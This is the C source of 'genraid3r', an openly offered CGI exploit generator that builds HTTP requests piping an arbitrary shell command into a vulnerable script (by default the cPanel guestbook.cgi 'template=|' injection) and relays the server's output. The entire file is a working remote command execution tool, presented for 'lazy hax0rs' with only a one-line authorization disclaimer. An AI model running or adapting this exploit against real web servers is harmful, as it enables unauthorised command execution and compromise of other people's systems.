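/* Begin genraid3r.c */
/* By J0hny_Lightning */
/* j0hnylightning@hotmail.com */
/*
** genraid3r.c is a cgi exploit generator for
** lazy hax0rs who don't want to use the web
** browser to do their stuff. All u need to do
** is modify some of the strings and compile
** to get an exploit for whatever cgi vuln.
** It will execute your command on the web
** server and print the output to stdout.
** Tested on FreeBSD 4.6.
**
** The strings you will need to change are:
** 1) PATH     This is the path to the vulnerable
**             script. (ie: "/cgi-bin/forum/postit.cgi" )
**
** 2) PART_ONE This is a string that is the first series
**             of arguments to the vulnerable script
**             before the command is executed. For example
**             if you are exploiting the cpanel
**             guestbook.cgi you should set PART_ONE to:
**             "?user=cpanel&template=|"
**
** 3) PART_TWO This is a string that is the last series of
**             arguments to be passed to the script after
**             the command to be executed. Sticking with
**             our example, PART_TWO should be set to "|"
**
** Compile using: gcc genraid3r.c -o genraid3r
** Usage: ./genraid3r <host> <command>
**
** Note: the command is pasted into the request line as-is, so
** any character that is not URL-safe (a space, '&', '#', ...)
** must be given in percent-encoded form.
** (ie: ls -al should be ls%20-al)
**
** Only run this against hosts you are authorized to test.
*/

/* Includes */
#include <stdio.h>      /* i/o                        */
#include <stdlib.h>     /* exit()                     */
#include <string.h>     /* memset()                   */
#include <errno.h>      /* errno / EINTR              */
#include <unistd.h>     /* close()                    */
#include <sys/types.h>  /* ssize_t                    */
#include <sys/socket.h> /* socket(), connect(), send()*/
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>      /* getaddrinfo()              */

/* oO0OooO0OooO0Oo Change these defines! oO0OooO0OooO0Oo */
#define PATH     "/cgi-sys/guestbook.cgi"   /* Path to the script */
#define PART_ONE "?user=cpanel&template=|"  /* First set of args  */
#define PART_TWO "|"                        /* 2nd set of args    */

/* Changing anything below this line voids the warranty */
#define DEST_PORT 80
#define MAXBUF    1024

/*
 * Write all `len` bytes of `buf` to `fd`, retrying on short sends and
 * on EINTR. Returns 0 when everything was written, -1 if send() failed
 * (errno is left as send() set it).
 */
static int send_all(int fd, const char *buf, size_t len)
{
    size_t done = 0;

    while (done < len) {
        ssize_t n = send(fd, buf + done, len - done, 0);
        if (n < 0) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        done += (size_t)n;
    }
    return 0;
}

/*
 * Resolve `host` and open a TCP connection to it on DEST_PORT.
 * Every address getaddrinfo() returns is tried in order (v4 or v6).
 * Returns the connected socket, or -1 after reporting the error on
 * stderr.
 */
static int connect_to(const char *host)
{
    struct addrinfo hints;
    struct addrinfo *res = NULL;
    struct addrinfo *ai;
    char port[16];
    int fd = -1;
    int rc;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    snprintf(port, sizeof port, "%d", DEST_PORT);

    rc = getaddrinfo(host, port, &hints, &res);
    if (rc != 0) {
        fprintf(stderr, "getaddrinfo(): %s\n", gai_strerror(rc));
        return -1;
    }

    for (ai = res; ai != NULL; ai = ai->ai_next) {
        fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (fd < 0) {
            continue;
        }
        if (connect(fd, ai->ai_addr, ai->ai_addrlen) == 0) {
            break;              /* connected */
        }
        close(fd);
        fd = -1;
    }
    if (fd < 0) {
        perror("connect()");
    }
    freeaddrinfo(res);
    return fd;
}

/*
 * Entry point: ./genraid3r <host> <command>
 *
 * Builds "GET PATH PART_ONE <command> PART_TWO", sends it to <host> on
 * DEST_PORT as an HTTP/1.0 request, and copies whatever the server
 * answers to stdout. Exits 1 on a usage, resolution, connect or send
 * error; 0 otherwise.
 */
int main(int argc, char *argv[])
{
    char request[MAXBUF];
    char reply[MAXBUF];
    int sock;
    int len;
    ssize_t got;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s <host> <command>\n", argv[0]);
        exit(1);
    }

    /*
     * Build the request before touching the network, with a bounded
     * write: the original sprintf() let an over-long argv[2] overrun
     * this stack buffer. A full HTTP/1.0 request line plus a Host header
     * is sent (the original "GET path \n\n" is an HTTP/0.9-style
     * request that name-based virtual hosts cannot route), so the reply
     * on stdout now starts with the server's status line and headers.
     */
    len = snprintf(request, sizeof request,
                   "GET %s%s%s%s HTTP/1.0\r\nHost: %s\r\n\r\n",
                   PATH, PART_ONE, argv[2], PART_TWO, argv[1]);
    if (len < 0 || (size_t)len >= sizeof request) {
        fprintf(stderr, "command too long: request exceeds %d bytes\n", MAXBUF);
        exit(1);
    }

    sock = connect_to(argv[1]);
    if (sock < 0) {
        exit(1);
    }

    fprintf(stdout, "Hey! Hey! Time for 0day...\n\n");
    fflush(stdout);

    if (send_all(sock, request, (size_t)len) < 0) {
        perror("send()");
        close(sock);
        exit(1);
    }

    /*
     * Relay the reply byte-for-byte. fwrite() with the received count
     * replaces the original printf("%s") over a buffer that recv() can
     * fill completely, leaving no NUL terminator to stop at.
     */
    while ((got = recv(sock, reply, sizeof reply, 0)) > 0) {
        fwrite(reply, 1, (size_t)got, stdout);
    }
    if (got < 0) {
        perror("recv()");
    }
    fflush(stdout);
    close(sock);
    return 0;
}
/* End genraid3r.c */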